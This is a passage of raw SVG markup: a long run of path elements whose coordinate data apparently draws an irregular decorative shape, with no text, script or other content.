d=\"M1696.1,95.3c10.3.3.8-.7,4.6-1.1C1692.8,94.2,1699.1,94.9,1696.1,95.3Z\"></path>\n        <path d=\"M1742,95.2c-1.3.1-2.4.6.7.8C1743.9,96,1745,95.4,1742,95.2Z\"></path>\n        <path d=\"M1715.4,93.4c1.1.1,2.8.1,3,.2-1.1,0-1.6.1-1.2.2,3.8.1,3.5-.1,3.9-.3C1717.4,93.4,1716.3,93.1,1715.4,93.4Z\"></path>\n        <path d=\"M1742.4,91c.9.2-1.1.5,1.9.6C1746.4,91.5,1748.7,91.1,1742.4,91Z\"></path>\n        <path d=\"M1711.2,90.3c2-.1,1.8-.7-3.4-.7C1709.3,89.8,1708.8,90.1,1711.2,90.3Z\"></path>\n        <path d=\"M1741.4,88.2c-3.6-.1-5.1.5-2.2.6C1739.7,88.6,1742.4,88.6,1741.4,88.2Z\"></path>\n        <path d=\"M1738,87.6a8.94,8.94,0,0,0,3.2.5c.3-.2,1.5-.5-.6-.7A6.92,6.92,0,0,1,1738,87.6Z\"></path>\n        <path d=\"M1729.4,85.7c-.9.3,2.5.4,4.7.5C1735.7,85.9,1734.6,85.6,1729.4,85.7Z\"></path>\n        <path d=\"M1877.1,86.3c4,.1,3.8-.2,3.7-.5C1876.4,85.7,1876.5,86,1877.1,86.3Z\"></path>\n        <path d=\"M1704.4,77.8c1.4,0,2.8.1,4.2.1-1-.4,3-.4-1.9-.6C1708.1,77.7,1703,77.4,1704.4,77.8Z\"></path>\n        <path d=\"M1724.7,72.5a26.77,26.77,0,0,1-4.2,0c5.2.5,1.9.9,6.7,1.2C1726,73.3,1728.1,72.7,1724.7,72.5Z\"></path>\n        <path d=\"M1811.9,73.8c0,.2-3.8.8,2.2.9C1813,74.4,1815.2,73.9,1811.9,73.8Z\"></path>\n        <path d=\"M1705.8,71.5c4.2.1,3.2.6,6.3.8-1.3-.4,5.9-.5.5-1C1715.2,71.8,1705.3,71.2,1705.8,71.5Z\"></path>\n        <path d=\"M1801.3,72.8c-5.2-.4-2.3-.7-6.3-.9.2.6,3.4,1,5.4,1.4C1798.9,73,1802.1,73.1,1801.3,72.8Z\"></path>\n        <path d=\"M1719.7,71.5c.2-.2,2.6-.7-1-1.1C1718.2,70.6,1716.4,71.1,1719.7,71.5Z\"></path>\n        <path d=\"M1711.3,69.9c-2.5,0-4.4-.1-5.8-.2-.8.4,3.2.6,3.6,1-2-.1-2.5-.2-4.4-.3l.2.2c-.9,0-1.7,0-1.3.1,4.5,0,2.3.4,6,.5,3.6-.4.4-.6-1-1.1C1709.6,69.9,1711.4,70,1711.3,69.9Z\"></path>\n        <path d=\"M1864.6,72c-3.3-.1-5.4-.1-7,0,.3.1,0,.3,1.7.4C1858.3,72,1866.3,72.5,1864.6,72Z\"></path>\n        <path d=\"M1725.4,68.6c.2-.5-1.5-.8-7.8-.9.4.2-.1.4,1.8.5C1723.9,67.7,1721.5,68.5,1725.4,68.6Z\"></path>\n        <path d=\"M1814.1,68.4c-3.8.1-7,.2-9.4.4,4.5.2,2.9-.3,8.3,0C1812.8,68.6,1813.1,68.5,1814.1,68.4Z\"></path>\n        <path d=\"M1758.3,63.3c-1.3.2-6.2.5-.7.7a10.17,10.17,0,0,1,2.7,0C1755.2,63.5,1762.2,63.7,1758.3,63.3Z\"></path>\n        <path d=\"M1911.3,66.7c3.6-.1,3.2-.7-2.2-.9C1910.8,66.1,1907.6,66.5,1911.3,66.7Z\"></path>\n        <path d=\"M1866.7,65a26.2,26.2,0,0,1-2.8-.1c-.9,0-1.6,0-1.3.1,4.7.1-3.8.4,3.2.5C1864.3,65.2,1867.5,65.3,1866.7,65Z\"></path>\n        <path d=\"M1854.4,63.6c0,.1.5.8,1.8.5-2.4-.5,8.7-.2,2.1-.7C1858.8,63.6,1857.5,63.7,1854.4,63.6Z\"></path>\n        <path d=\"M1836.4,63.8c.7-.2,4.7-.6-.7-.8,1.5.4-.9.4-2.3.5A21.47,21.47,0,0,1,1836.4,63.8Z\"></path>\n        <path d=\"M1810.8,61.5c.3.2.2.4,3.1.4-.2-.2-.3-.4-.5-.6-4.5,0-3.2-.4-6-.5-.4.2-3.9.1-2.3.5A27.87,27.87,0,0,0,1810.8,61.5Z\"></path>\n        <path d=\"M1865.5,60.5c.1.1.3.1,1.5.1l-.4-.4c-2.7,0-6.1-.1-5.4.2A41.15,41.15,0,0,1,1865.5,60.5Z\"></path>\n        <path d=\"M1726.5,52.4c-.3-.4,3.6-.4,5-.7C1725.3,51.5,1722.5,52.1,1726.5,52.4Z\"></path>\n        <path d=\"M1768,50.6a4.37,4.37,0,0,0,1.6.3c.9-.3-4.5-.8-6.1-.6C1766.5,50.4,1764.4,50.9,1768,50.6Z\"></path>\n        <path d=\"M1743.9,50.1c.4-.3,4.1-.4,3.5-.8C1743.5,49.2,1741.8,49.9,1743.9,50.1Z\"></path>\n        <path d=\"M1757.7,48.4c-4.3-.1-5.3.1-8.2.1a10.29,10.29,0,0,0,3.3.6C1753.2,48.8,1758.9,49,1757.7,48.4Z\"></path>\n        <path d=\"M1716.4,47.3c-.8.3-1.1,1,5.2,1.2C1719.6,48.1,1718.9,47.7,1716.4,47.3Z\"></path>\n        <path d=\"M1708.9,48.2c0-.3,5.4-.6,2-.8-1.6.4-.5-.3-3-.3-.8.3-.2.8-4.7,1C1707.1,48.2,1705.9,48,1708.9,48.2Z\"></path>\n        <path d=\"M1777.5,48.8a45.38,45.38,0,0,0,4.9.9C1784.6,49.5,1783.6,48.8,1777.5,48.8Z\"></path>\n        <path d=\"M1861.2,50.9c-1.6.1-5.2.1-7,0C1853.6,51.5,1865.8,51.2,1861.2,50.9Z\"></path>\n        <path d=\"M1742,48c2.5-.2,5-.1,2.3-.5C1740.8,47.3,1738.8,47.8,1742,48Z\"></path>\n        <path d=\"M1786.2,47.8c1,.4,2.4.7,6.4.9C1791.3,48.3,1790.3,48,1786.2,47.8Z\"></path>\n        <path d=\"M1746,46.2c.8-.3,1.6-.6-2.1-.8C1745.5,45.8,1740.4,46,1746,46.2Z\"></path>\n        <path d=\"M1747.7,43.4c.8,0,2.9-.5-.5-.6a15.43,15.43,0,0,1-2.8-.1C1744.5,43.1,1745.6,43.3,1747.7,43.4Z\"></path>\n        <path d=\"M1744.9,41.7c-.3,1.1,21.2.6,9.6-.1-1.9,0,2.3.6-2.3.6C1749.7,42.1,1747.9,41.8,1744.9,41.7Z\"></path>\n        <path d=\"M1685.2,119.2c-.9.1-5.1.4-.8.6-.1-.1,2.4,0,2.6-.2-1.6-.1-2.3-.2-3-.3C1686.3,119.4,1687.7,119.3,1685.2,119.2Z\"></path>\n        <path d=\"M1686.5,111.1a45.79,45.79,0,0,1,7.4.5,14.06,14.06,0,0,1-3.6-1C1685.9,110.5,1687.6,111,1686.5,111.1Z\"></path>\n        <path d=\"M1699.9,98c-5.9-.4,1.2-.8-5.1-1.1,0,.3,1.9.8-2.2.7a9.4,9.4,0,0,0-3.2-.5c-.3.4,3.6.7,6.1.6.6.2-1.7.2-2.5.3C1695,97.9,1700.4,98.2,1699.9,98Z\"></path>\n        <path d=\"M1453.3,87.6c-.1-.1,1-.1,1.2-.2-5-.1-1.5.5-.8.6,0-.2,3.5,0,2.5-.3A7.86,7.86,0,0,1,1453.3,87.6Z\"></path>\n        <path d=\"M1744.1,85c-4.3.5-10.5-1.5-16.4-1.2,7.8.5,7.6,1.4,16.9,1.8C1742.5,85.3,1748.3,85.2,1744.1,85Z\"></path>\n        <path d=\"M1702.2,81.7h0c-9.7.5-1.9,1.9-5.1,2.1,1.6,0,3.3.2,4.9.3a22.85,22.85,0,0,0,3.7,0c-1.6-.1-2.8-.2-3.7-.3-2.9-.4-1.8-1.1,0-1.4a11,11,0,0,1,1.9-.2C1698.9,81.9,1706.6,81.7,1702.2,81.7Z\"></path>\n        <path d=\"M1878.8,85c2.1.4-5,.5-.7.7a17.63,17.63,0,0,1,3.9-.4c.1.3-2.4.3,1.8.5C1886.6,85.7,1881.6,85.2,1878.8,85Z\"></path>\n        <path d=\"M1710.6,81.8c-3-.1-1-.4-1.9-.6C1699.7,80.9,1708.5,82.1,1710.6,81.8Z\"></path>\n        <path d=\"M1864.2,74.7c4.5.1,11.5.6,13,.5-5.8-.3-12.8-1.1-6.8-1.4-4.7-.2-.8.3-5.5.1.3-.1,1.8-.2,1-.4a31,31,0,0,0,4.2.1c-1.9-.4,2-.2,2.4-.4-8.4-.3-4,.6-13.7.2-7.6.9,3,2.8-3.5,3.8,2.2.3,2.9.1,4.4.3-4.5.1.1.4-2.1.7a41.63,41.63,0,0,1,6,.5c-2.8-.1-1.5.3-5.5.1-2.5-.1-.4-.5-3.3-.6.8.3-3.8.5-.8.6a98.15,98.15,0,0,1,10,.3c3.9-.6-.1-1.3-4.5-2,.1.1-1,.1-1.4,0,3.3.1,1.3-.3,4-.2s2.4.6,4.8.8a21.32,21.32,0,0,1,4.3.1c-5.7-1.4.5-1.9-8.1-2.9-.1.1.5.3-1.1.3C1861.8,75.1,1862.3,74.8,1864.2,74.7Z\"></path>\n        <path d=\"M0,0V30.7c.9,0,1.9,0,3.1.1l.4.4c13.8.4,10.5-.4,11.6-1,12.1.7,5.8,1.4,4.9,2.4a27.94,27.94,0,0,0,6.9-.1c8.1.9-6.5,1.7,5.1,2.6.3-.3,1.4-.6,3.4-.9.4,2-2.5,2.8,0,4.8-2-.1-2.5-.2-4.4-.3,1,.5,6,.7,6.7,1.2-1.7,0-4-.1-4.1,0,2.2.1,1.2.3.3.3,4.7.2,1.6-.3,5.4-.2,6.6.8.6,1.5,6.4,2.5-4,.1-3.4.6-6.2.8,6.4.3,8.8.1,11.7.6-6.2.1-12.2.4-17-.4.1.2-3.9,0-4.1.1,7.4.1,6.3.8,6.8,1.4,6.2.1,7.2.9,3.5.8,3.1.2,5.3.4,4.8.8-7,.3-7.5-.5-10.2-.6,1.1.3-1,.8,2.3,1,1.2-.6,2.7.6,8.5.2.2-.2-3.3-.2-4.6-.5,5.4.1,7.6.3,8.9.6-1.4.4-10.5.1-12.4.2,2.4.3-2.8.7,3.8,1.2-4.2-.6,1-1.3,7.6-.8.8.5-5.4,0-5.4.2,1.9.3,5.4,1.1-3.6.7,2.4.5,5.6.5,10.1.4,1,.5-4.4.3-6.9.1,1.3.3-2.6.2-2.4.4,4.3.3,7.7,0,11.3.3-.2.2-3.6.1-5.4.2,1.4.4,5.6.7,5.2,1.2-9.4,0,.6.7-7.5.9,3.5.1,4.3-.1,5.8.2-.2.2-5.2,0-5.4.2,3.5.1,6.9.1,7.3.4-.9,0-1.6,0-1.3.1-1.46-.17-2.93-.27-4.4-.3,5.4,1.5,6.2,1.8-3.4,2.4,6.2.3,4.5.9,2.4,1.1,4.4,0,4.5.3,7.3.4-1.9-.6,3.9-.2,6.9-.1,1.8-.4-.6-.6,2-.9-4.5-.1-3.8-.5-6.2-.7,3.2,0,4.6-.2,6.7-.3-3.4-.1-5.3-.9-3.6-1,3.5.2-.1.8,6.3.8-3.2-.6,1.6-.4,4.1,0,.1-1.4.4-1.3-2.2-2.6,3.3,0,6.2.4,8.6.3-7.9-.4,1.2-.9,1.6-1.4.4.2-.1.4,1.8.5,4.2-.1-.6-.3,3.9-.4a8.16,8.16,0,0,0,2.7,0c-4.5-.3-5.6-.2-8.7-.4.4-.9,2.8-2.3,16-2.4-3.9.4,4,1-1.6,1.4,3.4,0,3.3.3,7.2.3,1.8-.6,1.3-1.1,4-1.8a13.45,13.45,0,0,0,4.2,0c-1.7-.1-3.4-.1-3-.3a13.45,13.45,0,0,0,4.2,0c-2.7,0-5-.6-1.9-.6,1.5.7,8.8.3,11.8.8.5.5-8.1.1-5.2.4.8-.1,4.4.2,5.5-.1.9.2,6,.7,2.1.8a44.26,44.26,0,0,0-8.3,0c4.7-.1,8.5.1,11.3.3.3.5,2.4,1.2-3.2,1.1a55.14,55.14,0,0,0-5.9-.4c-1.8.3,4.9.2,4.5.4.4.2-.2.4,1.8.5,3.3-.1-2.8-.5,2.3-.5-.8.4,2.5.5,2.1.8-4.2-.1-4.1.2-8.3,0,.8-.3-5.5-.3-5.8-.2,2.3,0,1.7.8,4.5.4-1.4,0-2-.2-.2-.2.2.2,4,.2,4.4.3-1.5.1-1.4.4-3.8.5-2.3-.1-1.1-.3-3.1-.4-4.8.2,11.3,1.2-.4,1.1-.9-.2,1.2-.5-1.9-.6-4.3.3.3.8-3.2,1.1,3.2,0,5.4.1,5.9.4-4.2-.1-5.4.3-2.2.6-2.7.2-4.7-.2-7,0,3.8.1,3.6.7,4.8.8,0-.1.2-.3,2.6-.2,2.8.3-.9.3.6.7,5.3.2,2-.4,5.2-.4-.9.6,4.4.2,4.3.2,5.7.4-1.8.6-5.1.5,5.5,0,10.2.6,11.3.1-6-.3,2.2-.4-3.5-.8,3.3.1,5.3.1,5.5-.1-3.1-.3-5.9.1-7.3-.4,1.7-.9,14.3.1,13.1.7,2.7-.2,1.8-.2.8-.6,4.9.5,3.1-.1,5.4-.2,3.3.3-.1,1.1,5.3,1.3-.3-.7-1.8-1.4-.1-1.6,7.8.6,4.1,1.4,9,2.3-3.3-.1-5.3-.1-5.5.1,3,.3,2.4.9,5.2,1.2-6.1-.1-2.8.6-2.1.8,1.2-.1,10.6.2,6.8-.2.6.2-4.1-.1-4.3-.2a7,7,0,0,0-1.7-.4c6.7,0,.8-.6,6.4-.6-2.7-.1-3,.1-5.6,0,3.6-1.1,2.1-1.4,3.7-2.1-5.2-.7-7.4-1.9-2.1-2.3a36.81,36.81,0,0,1-4.2-.1c4.8-.1.5-.5.5-1,2.7,0,6.1.1,5.4-.2-6.8,0-4.7-.6-1.9-.6a15.66,15.66,0,0,1-2.9-.2c4,0,5.7.7,7.3.4-3-.1-.8-.5-4.7-.5-.8.1-2.9.1-5.5.1-.3-.3-.5-.6-.8-.9-4.9.1-7.9-.3-9.6.1,3.4.1,2.9-.1,7,0-.2.3,1.2,1-4.9.8,4.4.1-2.6,1.2,4.9.9,0,.2-.6.4-2.4.4-4.5,0-6.7-.2-10-.3a19.29,19.29,0,0,1-3.7.6c-.2-.2-4-.2-4.4-.3,1.6-.2-4.6-.6-.5-.6,2.7.1,1.3.4,4.5.4-.4-.3,4.2-.2,2.2-.7-7.8-.4-10.8-2-1.4-1.6-3.2-.6-2.8-.8-7.4-.5,2.5-.4.2-1.1-3.7-1.1,2.7,0,.7-.3,4-.2,2.9.1-.3.6,4.7.7,4.1.1-1.9-.8,2.2-.7-.2.3,5.6.2,4.6.5-4.3-.3-4.6.1-2.4.4-2.7-.3-4.9-.1-4,.2a36.19,36.19,0,0,1,8.7.4c-.6-.7,1.3-1.3,1.2-1.8-.5.2-3.1-.4-6-.5-2.6-.9,3.7-.9,1.2-1.8,2.4.4,5.6-.1,7.2.3-4.3-.1-3.3.8-2.1.8a15.37,15.37,0,0,1,2.8.1c-5.2-1.2,11.7-1,9.7,0a52.3,52.3,0,0,0-5.6,0c1.1.3-1.6.7,3.4.7-3-.9,6.9-.1,10.6-.6-.7-.1-6.1-.1-7.4-.5,3.4-.2,8.1.3,9.8.1-2-.4-6.1-.3-8.8-.5.5-.4,4.6-.6,6.9-.1-.5-.3.3-.4,2.3-.5.1.1,2.6.2,3.1.3.2,1-.3,1.7-1.5,2.4.8-.1,2.1-.1,2.2.1-.1.3-1.4.5-3.7.6,5.7.1,3.2.1,3.1.4,2.7.1,3-.1,5.6,0,.4.7,4.7,1.3,0,1.5a82.23,82.23,0,0,0-11.1,0c-5.7-.9,2-1.7-.7-2.3-3.4.1-2.3.7-6.3.7-.4-.8,7-.9,7.1-1.4a73,73,0,0,0-12,.6c-8.2,0-2.8-1-11-1.4,1.3.6,3.9,1.3,10,1.9-6.8.2-5.2.7-7.2,1.3,5.5-.1.8-.3,8.4.1,1.7-.2-4-.5-.4-.4s2.8.6,6.3.8c-2.3.2-2.9.3-.8.6,3.4.1,5.3-.5,9.7,0-3.8.4.5.2,2,.7-1.3.3-4.8-.1-5.3.3,4.5,0,8.1.8,4.9.9-2.7-.1-1.3-.4-4.3-.2,6.3.5,1.5.8,7.8.9-4.2.4,2,.7-1.8,1.2,3.7.2,4.4,0,5.8.2-4.6.2,6.1.7.8.9-.3-.1,0-.3-1.7-.4,2,.7-5.3-.1-5.3.3,9.2.5,10.2,2.1-3,1.4,1-.2-1.8-.7-3.1-.4,2.1.1,1.5.3,1.8.5,7.2.4,11.5.7,7.9,1.1-1.6-.1-6.9-.6-8.6-.3,7,.2-1.4.4-.8.6a53.87,53.87,0,0,1,8.8.5c2.1,0,5.4-.4,6.8-.2.1.3-2.3.3.5.6-1.9,0-3.8-.1-5.7-.1,8.3,1.1,3.6,1.5,2.1,2.3,5.1.2.2.4,3.3.6a13.76,13.76,0,0,1,4.1-.1c1.5.5-6.6.4-2,.9-3.2-.1-5.3-.1-5.5.1,5.4.1,1.4.5,7.3.4-2.8.2.7.4,2,.7,4.9-1.5-2.8-3.3,4.1-4.8a36.81,36.81,0,0,1-4.2-.1c-.9-.5,4.3-.6,1.8-1.2-6.7-.2,1.3.4-2.5.3-5.1-.5-2.2-.8-2.6-1.4a43.87,43.87,0,0,0,5.5-.1c-.8.4-6.2.4-.6.8-.5-.3,3.8-.6.7-.9,1.2-.1,1.3-.3-.4-.5.1.3-4.7-.1-4.4-.2,2.8-.3-3.1-.7,2.1-.7.5.4-.6.8,4.9.9-.1-.7-1.3-1,1.7-1.3-3.1,0-4.6-.2-4.5-.4,7.5-.2-1.9-1.3-4.2-1.6,3.7-.1,5.6-.3,7.9-.5a36.81,36.81,0,0,1-4.2-.1c0-.3,3.3-.4,5.1-.5-7.7-.2-3-.4-6.4-1,2,.1,2.5.2,4.4.3.6-.4-2.7-1.1.3-1.2a33.79,33.79,0,0,1,4.5.3c1.4-.1.1-.4,4-.2-1.5-.2-1-.6-3.4-.7-3,.1-2.7.6-7.9.5,1.7-.4,2.9-.1-1.8-.5,4.1,0,4.6-.5,8.4.1-.2-.3-1.4-.7,2.3-.6,1.3.3,3.4.5,3.5.8a43.14,43.14,0,0,1,8.8.5c1.9-.3-1.5-.6-4.9-.9a13.45,13.45,0,0,1-4.2,0c1.9-.2-1.8-.4,2.4-.5-2.1-.1-5.2-.1-5.8-.2.6-.1,1.3-.2,2.5-.3,8.9.5,11.6,1.1,12.7,1.8,2.1.1,7.2,0,7.2.3-1.9,0-1.1.2-2.6.2-4.9,0-7.5-.4-8.4-.1,15.2.5,10.2,1.8,7.5,2.2-.1.3,3.8-.2,4.4.2-.7.4-3.7.9-1.7,1.3-1.6,0-4.1-.1-4.1,0,10.7.6-1.5,1.9,3.5,2.4-.2-.1.4-.3,1.3-.1.5.4-7,0-6.6.4,3.4.2,5.8-.3,7,0-4.7.1.2.1,1.8.5-3,.1-2.2.6-5.2.4,10.3,1-1.4,1.7.7,2.4-5.3-.1-5.1.3-6.4.6,5.3.2,2.2-.5,6.6-.4-1.7,1,5.6,2.5,10.1,3.6-3.8,0-3.1-.3-5.9-.4-.7.4,5.6.4,6.2.7-5.7.4-13.7.9-4.1,1.7.1-.2-.9-.4,1-.4.2.3,7.9,1.3,1.4,1.6-2-.2-5.4-.2-6-.5,1.8,0,2.4-.2,2.4-.4-4.4,0-4-.4-7.4-.5-1.7.4,4.1.3,3.3.6-3.9-.1-3-.2-5.7-.1,3.3.2,4.4,1,7.7.8-6,.2,3.5,1.2-2.9,1.5-3.6-.2,3.3-.5-3.3-.6-.8.2-.5.6.8.9,6.3.2-1.3-.2,2.6-.2,6.2.1,5.4,1.2,9.2,1-6-.8-.1-1.5-5.7-1.8,3.7-.2,4.2-.6,9.1-.7.1.4.8.3,2.3,1-4.2,0-13.5.6-2,.8-1.5-.4.9-.5,3.8-.5-3.1.3,4.8.6.8.9,6.3.1.8-.9-1-1.1,1.8,0,2.1.2,4.4.2-3.6-1.5.8-2.2,5.5-3.3-7.3-.2-4,.6-10.6.5-.1-.1-1.3-.2-1.6-.3,4.5.1,4.5-.3,3.6-.7,4.8.1,5.9-.1,8.2-.1-9.7-.7-4.3-1.6-1.9-2.1a21.47,21.47,0,0,1,3,.3c1.5-.6.8-1.1-3.9-1.3,2.9.1-3.7-.8.7-.7.9.1,4.7.5,5.8.2-4.4-.3-4.7-.8-5.3-1.3a53.22,53.22,0,0,0,6.8-.2c-2.5-.4-6.4.1-8.6-.3,5.5-.1.3-1,7.4-1.1-3.6,0-5.2-.2-4.6-.4,1.7.1,9.6.4,5.7.1-5.1,0-4.2-.9-.7-.8-.2.9,8.5.6,10.9,1.3a24.32,24.32,0,0,1-2.7,0c-2.8-.1-2.1-.3-5.9-.3-.3.5-3.8.4.8.9a45.4,45.4,0,0,1-6.9.1c-.2.4,7,.4,7.6.7.3.3-2.2.3-.8.6-1.4,0-2.8-.1-4.2-.1,3.2.6-.3.2,4.9.9-1.5.4-5.5.4-9.4.3,1.2.2,7.9.1,8.7.4.1.6,3.1,1-.2,1.3-2.3-.1-1.1-.3-3.1-.4l.4.4c4.6.2,4.2-.1,7.1.2-4.9-1.3,3.4-2.1-2.9-3.2,1.6-.1,3.7-.1,7,0-1.5-.6-2.7-1.1-4.5-.4-.9-.2-2.3-.3-3.2-.5,6.2.1,6.6-.4,2.3-.5,5,.1-3.3-.4,1.1-.3,4.4-.1,3.8.6,6.5,1,3.9-.3-1.6-1.2-2.9-1.7,6.4.6-.6-.8,3.5-.8,2.4.1,3.5.8,6,.5-4.7-.5-2.6-1-9.7-1.5,9.2-.4-10.1-2.1,1.8-2.7-4.4-.3-2.6-.8-.9-1,3.2.1-.2.6,6.1.6-.8-.4-3-.7-6.3-.9.2-.2,3.6-.1,3.9-.3-2.6-.1-5.4-.7-3.3-.6,1.7.1,1.7.2,1.7.4a29.51,29.51,0,0,0,5.4-.2c-2.1-.1-5.2-.1-5.8-.2a76.33,76.33,0,0,0,12.9-1.1c-7.2-.2,2.2-.6-6.2-.7,0,.4,4.5,1.1-.9.5-3.2.2,2.6.7-.6.9-.9,0-1.9,0-2.9-.1-1.2-.6,6.9-.8,1.5-1.5-.1.1.5.3-1.1.3-.1-.1-1.3-.2-1.6-.3.4-.2,5.4,0,3.9-.3-7.6.2-.1-1.1-10.9-1.3,5.1-.1-1.1-.2-.6-.7a24.32,24.32,0,0,1,2.7,0c2.6.1,5.3.7,7.3.4-3.5-.1,0-.7-4.8-.8,1.2.2-2.4.4-2.6.2-1.8-.5,8.2-.3,2.1-.8a8.77,8.77,0,0,1-2.8,0c4.1-.4.9-.9,1.6-1.4,2.1.3,2.2.8,6.5,1-1.4-.5.1-.7,3.5-.8-5.1-.2-7,.1-8.6-.3,4.2.1,1.1-.6,5.1-.5-4.8.1-7.6-.5-8.6-.3,5.3.4-3.5,0-2.6.2,2.3,0,2.8.7.5.6.4-.3-3.5-.9-4.7-.7,3.5.1.6.4-1.1.3-3.3-.3.4-.3-.6-.7-2.7-.2-4.5.2-5.7-.1.6-.6,4.6-1,1.1-1.9,3.8.5,5.1-.5,8.3,0-2,.2-3.5.8,2.4,1.1-2-.6-3.2-1.6,1.2-1.8,2.1.7,1,.8-1.7,1.3,7.7.1,9.3.4,17.3.7.8-.3-4.6-.9-4.9-.8-1.6.2,5.9.5,1.8.5a36,36,0,0,1-7.6-.7c4.5-.1.6-.4,2.1-.8,5.7.3,2.7-.2,5.4-.2,2.8.3.4.3.5.6,8.8.1-.3-.4-.7-.8,2.5,0,4.4.1,5.8.2a9.4,9.4,0,0,0-3.2-.5c-1.5.5-12.5-.4-10.5-.9a54.5,54.5,0,0,1,7,0c.1-.2-1.8-.3-1.8-.5,5.1.1,3.5-.4,8.1-.3-2-.5-.4-.5-4.8-.8-4.1,0-.1.4-2.5.4-2.2-.1-5.6-.7-2-.7,4.6.1,7.7.5,8.3,0-7.3.1-1.1-.2-4.5-.4a87.83,87.83,0,0,1-9.6.1c-1.1-.7,1.9-.8,1.7-1.2,1.8.3,1.6.8,5,1,4.9-.4-3.4-1.4,2.8-1.6-3.5.4,3.8.5,6.3.9,1.7-.2,4.5.3,5.6,0a41.63,41.63,0,0,1-6-.5c4.4,0,6-.5,9.5-.2-2.3-.6-8.7-1.4-.2-1.8,1.5.2-3.9.3.4.4a3.3,3.3,0,0,1,1.4,0c.8.3-6.5-.2-4,.2,7.2.3,6.1,1.1,9.8,1.6-3.9-.2-2.6.2-4,.2,3.4-.1,3.9.6,5.8.2-5.3-.3,2.2-.3.9-.5-6.7-.3,1.5-.7-3.9-1.3,2.1.1,5.2.1,5.8.2-.4.1-3.1.3.4.4.2-.3,1.9-.4.7-.7-2.5,0-3.4-.2-3.1-.4a42.45,42.45,0,0,1-7.3-.4c4.4,0,6,.4,7,0-6.1-.3-10.4-.7-14.8-1.1a37.36,37.36,0,0,0,5.5-.1,4,4,0,0,0,1.6.3c-1.9-.6,4.9.3,5.5-.1-9.7-.4-2.6-.4-9.2-1,4.7.2,3,.2,5.6,0,.7.6.3.1,4.3.2.1.1,1.3.2,1.6.3-4.1-.3-3.5.4-1,.4a83,83,0,0,1,8.5.2,36.57,36.57,0,0,0-8-1.2c.8-.5,1.5-.9,7.8-.6.5.3-2.9.2-3.9.3,3.9.5,5.4,1,8.2,1.4-2.5-.4,5.9-.2,5.6,0-1.6.3-5.8.7-.7.7-7.8,0-4,.8-10.4.7-.3.4,3.9.5,6.2.7-3.6-.1-1.9.4-3.8.5a38.81,38.81,0,0,0-6.9.1c4.4.1-2,.7,1.8.5.6-.1,1.3-.2,2.5-.3-.4.3,2.4.5,3.4.7,4.8.2,1.8-.4,8.2-.1-.6.2-.3.4-2.4.5-1.1-.3-2.5.2-5.5.1,2.2.5.4.5,1,1.1,7.5.2.4-.5,2-.9,10.8.2,9-.7,17.4-.7-1.7-.4-6.7-.5-2-.7-2.3-.1-4.7-.1-7.1-.2-.4.3,4.6.3,3.4.7a17.57,17.57,0,0,1-3.9.4,30,30,0,0,1-3.6-1c4.5.1,1.7-.4,4.3-.4-8.9,0-4.1.8-12.1,1,1.8-.5,2.6-1.3,12.5-1.6-.5-.2-2.3,0-2.9-.2,1.4,0,1.6-.2-.2-.2.9.2-3.3.5-4,.2,1.8-.2,1.7-.7,4.9-.8,2.9.1,1.7.4,4.6.5.6-.1,1.8-.2,2.5-.4-2.8-.1-9.4-.5-4.8-.7,2.7.7,2.1-1,9.3-.4-.8-.3-4.8-.4-3.5-.8,6.2.4,2.4-.1,5.4-.2,3.2,1.3,6.6,3.1-2.7,3.2,1.8.7,1,1,2.7,1.5,1.9,0,3.2.1,4.3.2-.5-.4,6-.1,6.6-.4-4.1,0-6.9,0-8.5-.2.9-.3-4.8-.7-.7-.8,1.7.2,1.9.4,2,.7,5.3,0,11.5-.5,7.4-1,.1.3.2.6-3.8.5.7-1.4-7.4-3.4,9.8-3.1-5.5-.3,7.8-.3.7-.7-1.4.1-.1.4-4,.2-1.1-.5-.4.1-4.3-.1a5,5,0,0,1-.6-.7c-6.1-.2-4.2.4-9.4.3,3.8-.7,20.4-1.5,5.1-2.1,0-.1-.1-.1-.2-.2,3.4-.1,6.2.5,7.1.2-2.2-.1-4.6-.3-4.6-.5,6.3.2-1.7-.6,2.1-.7,6.8.6,6.8,1.5,6.1,2.2,1.6.1,2.3.2,3,.3,5.8.3,7-.3,9.8.1-2.6.2-2.7,0,.3.3-3.9,0-5.2.3-4.9.8,7.7.2-.3-.4,3.8-.5,8,1.3-1.1,1.5,2.4,2.7,6.5.3,3.7.7,10.4.8-5.3,0-8.5.3-11.3-.3-1,.3,4.5.9,6.2.7-1.2-.2,3.8.3,3.9-.2a21,21,0,0,1,4.8.8c-2.5.1-2.6-.1-7.1-.2-.4.4-.5.3.7.8,1.9.3,5.1-.1,7.2.3a40.53,40.53,0,0,0-6.4.6c9.2.7,4.1,1.5,4.8,2.3-3.3-.1-9.6,0-5.3.2,1.8-.1,4.6-.2,8.2-.1-2.1.3-4.3.4-.6.9-7.5-.2.5.6-5,.7,2.1.1,7.2,0,7.2.3l.2.2c-5.1-.1-7-.4-11.5-.5-1.7.4,6.4.2,4.6.5,4.1.2,3.5-.1,7,0-1,.5,4.6,1.1-1.5,1.5,5.6.2,3,.5,4.8.8-.9.2-7-.2-5.4.2,2.7,0,3.2.2,5.8.2.1-.1.2-.3,2.7-.2,10.2.6,3.7,1.5,3.2,2-.1.1,7.4,1.2-2.3.6,1.7.3,2.9.8-3.7.6.6-.2,3.2-.2,2.3-.6-4.2-.1-5.1-.4-8.8-.5,1.5.5-4-.3-2.5.3.8.4,7-.1,8.6.3a17.63,17.63,0,0,1-3.9.4c-1.46-.17-2.93-.27-4.4-.3-.6.2-3.2.7-.6.9,2.4,0-.6-.5,2.3-.5,2.7,0,11.7.5,2.9.2-.1.4,8.2.3,6.3.8-2.4,0-3.8-.2-4.3-.1.2.4,3.7,0,6,.5a51.1,51.1,0,0,1-5.4.2c4.4.5-2.2,1.3,6.4.9a3.92,3.92,0,0,1-2.3.5c-1.5-.4-2.2-.2-5.8-.2,1.4.6-.8.9-1.6,1.4,3.3.2,5.1-.2,5.7.1-3.6-.1,2.1.2.4.4-2.1,0-5.3-.2-5.6,0,.5.5,3.4,1.1-1.9,1-.9-.2,1.2-.5-1.9-.6-3.9.3,4.3.8,1,1.1,1.9,0,3.8.1,5.7.1,0,.4,5.7,1-3.5.8,2.7-.4-5.2-1-10.5-.9.1.3,1.4.7-.6.9,2.1.3,4.1-.1,5.8.2-2.1.3,6.3,1.5,3.1,1.9,2.8,0,.7-.5,5.2-.4,5.3.9-3.4,1.6-.9,2.2a37.63,37.63,0,0,1,3.8-.5c2.3.6-2,.9-1.3,1.7.1.1,2.6.2,3,.3-.1.5-7,.9-11.7.9,9.5.3,8.4-.3,12.1-.5,3.8.6-3.6.6,1.1,1.2,2.2,0